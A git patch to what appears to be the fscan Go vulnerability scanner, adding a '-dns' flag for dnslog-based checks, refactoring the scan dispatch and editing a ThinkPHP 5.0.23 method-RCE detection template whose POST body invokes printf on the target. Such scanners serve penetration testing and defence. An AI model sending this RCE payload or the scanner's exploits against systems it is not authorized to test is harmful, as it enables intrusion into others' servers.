From 98569648bb33d5b98783e7bddb9193eb5565d255 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BD=B1=E8=88=9E=E8=80=85?= Date: Tue, 16 Aug 2022 11:18:09 +0800 Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0-dns=E5=8F=82=E6=95=B0?= =?UTF-8?q?=E5=90=AF=E7=94=A8dnslog=20poc?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Plugins/scanner.go | 51 ++++++++++-------------- WebScan/lib/check.go | 4 +- WebScan/pocs/thinkphp5023-method-rce.yml | 6 +-- common/config.go | 1 + common/flag.go | 9 ++++- go.mod | 1 - go.sum | 5 +-- 7 files changed, 37 insertions(+), 40 deletions(-) diff --git a/Plugins/scanner.go b/Plugins/scanner.go index 567871d..2fc2bdc 100644 --- a/Plugins/scanner.go +++ b/Plugins/scanner.go @@ -1,7 +1,6 @@ package Plugins import ( - "errors" "fmt" "github.com/shadow1ng/fscan/WebScan/lib" "github.com/shadow1ng/fscan/common" @@ -21,6 +20,8 @@ func Scan(info common.HostInfo) { lib.Inithttp(common.Pocinfo) var ch = make(chan struct{}, common.Threads) var wg = sync.WaitGroup{} + web := strconv.Itoa(common.PORTList["web"]) + ms17010 := strconv.Itoa(common.PORTList["ms17010"]) if len(Hosts) > 0 || len(common.HostPort) > 0 { if common.IsPing == false && len(Hosts) > 0 { Hosts = CheckLive(Hosts, common.Ping) @@ -30,6 +31,7 @@ func Scan(info common.HostInfo) { common.LogWG.Wait() return } + common.GC() var AlivePorts []string if common.Scantype == "webonly" { AlivePorts = NoPortScan(Hosts, info.Ports) @@ -47,6 +49,7 @@ func Scan(info common.HostInfo) { common.HostPort = nil fmt.Println("[*] AlivePorts len is:", len(AlivePorts)) } + common.GC() var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...} for _, port := range common.PORTList { severports = append(severports, strconv.Itoa(port)) @@ -56,31 +59,30 @@ func Scan(info common.HostInfo) { info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1] if common.Scantype == "all" || common.Scantype == "main" { switch { - case info.Ports == "135": - AddScan(info.Ports, info, ch, &wg) //findnet case info.Ports == "445": + AddScan(ms17010, info, &ch, &wg) //ms17010 //AddScan(info.Ports, info, ch, &wg) //smb - AddScan("1000001", info, ch, &wg) //ms17010 //AddScan("1000002", info, ch, &wg) //smbghost case info.Ports == "9000": - AddScan(info.Ports, info, ch, &wg) //fcgiscan - AddScan("1000003", info, ch, &wg) //http + AddScan(web, info, &ch, &wg) //http + AddScan(info.Ports, info, &ch, &wg) //fcgiscan case IsContain(severports, info.Ports): - AddScan(info.Ports, info, ch, &wg) //plugins scan + AddScan(info.Ports, info, &ch, &wg) //plugins scan default: - AddScan("1000003", info, ch, &wg) //webtitle + AddScan(web, info, &ch, &wg) //webtitle } } else { - port, _ := common.PORTList[common.Scantype] - scantype := strconv.Itoa(port) - AddScan(scantype, info, ch, &wg) + scantype := strconv.Itoa(common.PORTList[common.Scantype]) + AddScan(scantype, info, &ch, &wg) } } } + common.GC() for _, url := range common.Urls { info.Url = url - AddScan("1000003", info, ch, &wg) + AddScan(web, info, &ch, &wg) } + common.GC() wg.Wait() common.LogWG.Wait() close(common.Results) @@ -89,35 +91,26 @@ func Scan(info common.HostInfo) { var Mutex = &sync.Mutex{} -func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) { +func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync.WaitGroup) { + *ch <- struct{}{} wg.Add(1) go func() { Mutex.Lock() common.Num += 1 Mutex.Unlock() - ScanFunc(PluginList, scantype, &info) + ScanFunc(&scantype, &info) Mutex.Lock() common.End += 1 Mutex.Unlock() - <-ch wg.Done() + <-*ch }() - ch <- struct{}{} } -func ScanFunc(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) { - f := reflect.ValueOf(m[name]) - if len(infos) != f.Type().NumIn() { - err = errors.New("The number of infos is not adapted ") - fmt.Println(err.Error()) - return result, nil - } - in := make([]reflect.Value, len(infos)) - for k, info := range infos { - in[k] = reflect.ValueOf(info) - } - result = f.Call(in) - return result, nil +func ScanFunc(name *string, info *common.HostInfo) { + f := reflect.ValueOf(PluginList[*name]) + in := []reflect.Value{reflect.ValueOf(info)} + f.Call(in) } func IsContain(items []string, item string) bool { diff --git a/WebScan/lib/check.go b/WebScan/lib/check.go index dd071db..fe92be0 100644 --- a/WebScan/lib/check.go +++ b/WebScan/lib/check.go @@ -82,7 +82,9 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) { for _, item := range p.Set { k, expression := item.Key, item.Value if expression == "newReverse()" { - return false, nil, "" + if !common.DnsLog { + return false, nil, "" + } variableMap[k] = newReverse() continue } diff --git a/WebScan/pocs/thinkphp5023-method-rce.yml b/WebScan/pocs/thinkphp5023-method-rce.yml index 0e09b4a..a573fa2 100644 --- a/WebScan/pocs/thinkphp5023-method-rce.yml +++ b/WebScan/pocs/thinkphp5023-method-rce.yml @@ -1,6 +1,4 @@ name: poc-yaml-thinkphp5023-method-rce -set: - rand: randomLowercase(10) groups: poc1: - method: POST @@ -8,9 +6,9 @@ groups: headers: Content-Type: application/x-www-form-urlencoded body: | - _method=__construct&filter[]=var_dump&method=GET&get[]={{rand}} + _method=__construct&filter[]=printf&method=GET&get[]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu expression: | - response.body.bcontains(bytes(rand)) + response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu") poc2: - method: POST path: /index.php?s=captcha diff --git a/common/config.go b/common/config.go index 1cb5d16..8afdc84 100644 --- a/common/config.go +++ b/common/config.go @@ -99,6 +99,7 @@ var ( ) var ( + DnsLog bool PocNum int PocFull bool CeyeDomain string diff --git a/common/flag.go b/common/flag.go index ccd9eb3..e00480c 100644 --- a/common/flag.go +++ b/common/flag.go @@ -10,13 +10,17 @@ import ( func init() { go func() { for { - runtime.GC() - debug.FreeOSMemory() + GC() time.Sleep(10 * time.Second) } }() } +func GC() { + runtime.GC() + debug.FreeOSMemory() +} + func Banner() { banner := ` ___ _ @@ -72,6 +76,7 @@ func Flag(Info *HostInfo) { flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work") flag.StringVar(&Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login") flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout") + flag.BoolVar(&DnsLog, "dns", false, "using dnslog poc") flag.IntVar(&PocNum, "num", 20, "poc rate") flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add") flag.Parse() diff --git a/go.mod b/go.mod index a6b28d6..767fb90 100644 --- a/go.mod +++ b/go.mod @@ -19,7 +19,6 @@ require ( golang.org/x/text v0.3.6 google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0 gopkg.in/yaml.v2 v2.4.0 - gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect ) replace github.com/tomatome/grdp v0.0.0-20211231062539-be8adab7eaf3 => github.com/shadow1ng/grdp v1.0.3 diff --git a/go.sum b/go.sum index 4c9fe6c..2df01ac 100644 --- a/go.sum +++ b/go.sum @@ -50,8 +50,6 @@ github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7 github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4= github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo= github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ= -github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w= -github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc= github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-gl/gl v0.0.0-20181026044259-55b76b7df9d2/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk= github.com/go-gl/gl v0.0.0-20190320180904-bf2b1f2f34d7/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk= @@ -255,7 +253,6 @@ golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8U golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= -golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210322153248-0c34fe9e7dc2/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4= golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a h1:kr2P4QFmQr29mSLA43kwrOcgcReGTfbE9N577tCTuBc= @@ -331,6 +328,8 @@ golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da h1:b3NXsE2LusjYGGjL5bxEVZZORm/YEFFrWFjR8eFrw/c= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=